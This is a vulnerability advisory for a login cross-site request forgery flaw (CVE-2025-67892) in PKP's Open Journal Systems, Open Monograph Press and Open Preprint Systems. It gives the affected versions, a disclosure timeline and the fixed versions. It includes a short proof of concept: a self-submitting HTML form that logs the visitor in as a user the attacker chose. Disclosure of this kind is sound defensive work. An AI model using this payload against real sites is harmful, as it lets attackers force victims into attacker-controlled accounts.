egix@karmainsecurity ~ $

PKP-WAL <= 3.5.0-1 Login Cross-Site Request Forgery Vulnerability

• Software Links:

https://pkp.sfu.ca

https://github.com/pkp/pkp-lib

• Affected Versions:

Version 3.3.0-21 and prior versions.

Version 3.4.0-9 and prior versions.

Version 3.5.0-1 and prior versions.

• Vulnerability Description:

Open Journal Systems (OJS), Open Monograph Press (OMP), and Open Preprint Systems (OPS) allow users to perform a login without providing the “csrfToken” parameter, which is included on the client-side, but it’s not validated on the server-side. As such, all these applications are vulnerable to potential “Login Cross-Site Request Forgery” attacks.

• Proof of Concept:

Open an HTML page like the following with a browser, and you will be automatically logged-in as the chosen user:

<html>
 <body>
  <form action="http://localhost/ojs-3.5.0-1/index.php/egix_journal/login/signIn" method="post">
    <input type="hidden" name="username" value="tester">
    <input type="hidden" name="password" value="password">
  </form>
 </body>
 <script>document.forms[0].submit()</script>
</html>

• Solution:

Upgrade to versions 3.3.0-22, 3.4.0-10, 3.5.0-2, or later.

• Disclosure Timeline:

[21/10/2025] – Vendor notified

[24/10/2025] – Vendor fixed the issue and opened a public GitHub issue: https://github.com/pkp/pkp-lib/issues/11978

[12/11/2025] – CVE identifier requested

[20/11/2025] – Version 3.3.0-22 released

[22/11/2025] – Version 3.4.0-10 released

[12/12/2025] – CVE identifier assigned

[29/11/2025] – Version 3.5.0-2 released

[23/12/2025] – Publication of this advisory

• CVE Reference:

The Common Vulnerabilities and Exposures program (cve.org) has assigned the name CVE-2025-67892 to this vulnerability.

• Credits:

Vulnerability discovered by Egidio Romano.